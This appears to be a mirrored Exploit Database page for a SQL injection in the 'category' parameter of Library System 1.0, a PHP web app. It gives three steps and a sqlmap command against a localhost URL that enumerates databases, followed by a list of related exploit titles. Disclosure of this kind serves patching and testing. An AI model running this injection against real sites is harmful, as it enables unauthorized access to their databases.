Library System 1.0 – ‘category’ SQL Injection

Exploit Database
81 阅读

作者： Aitor Herrero

日期： 2021-01-25
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/49471/

# Exploit Title: Library System 1.0 - 'category' SQL Injection
# Exploit Author: Aitor Herrero
# Date: 2021-01-22
# Vendor Homepage: https://www.sourcecodester.com/php/12275/library-system-using-php.html
# Software Link: https://www.sourcecodester.com/php/12275/library-system-using-php.html
# Version: 1.0
# Tested On: Windows 10 + XAMPP 7.4.4
# Description: Library System 1.0

#STEP 1 : Go to the principal main
#STEP 2 : Choose a category example :http://localhost:8080/libsystem/libsystem/index.php?category=3
#STEP 3: Run your sqlmap example:
sqlmap -u "http://localhost:8080/libsystem/libsystem/index.php?category=3" --dbs

last Exploits
Library System 1.0 – ‘category’ SQL Injection的更多信息

PackWeb Formap E-learning 1.0 – ‘NumCours’ SQL Injection：
Adiscan LogAnalyzer 3.4.3 – Cross-Site Scripting：
Oxwall 1.7.4 – Cross-Site Request Forgery：
WordPress Plugin yolink Search 1.1.4 – SQL Injection：
Advantech WebAccess < 8.3 - SQL Injection：
Paypal Clone Script 1.0.9 – ‘id’ / ‘acctype’ SQL Injection：
PivotX 2.2.2 – ‘module_image.php’ Cross-Site Scripting：
Enigma NMS 65.0.0 – OS Command Injection：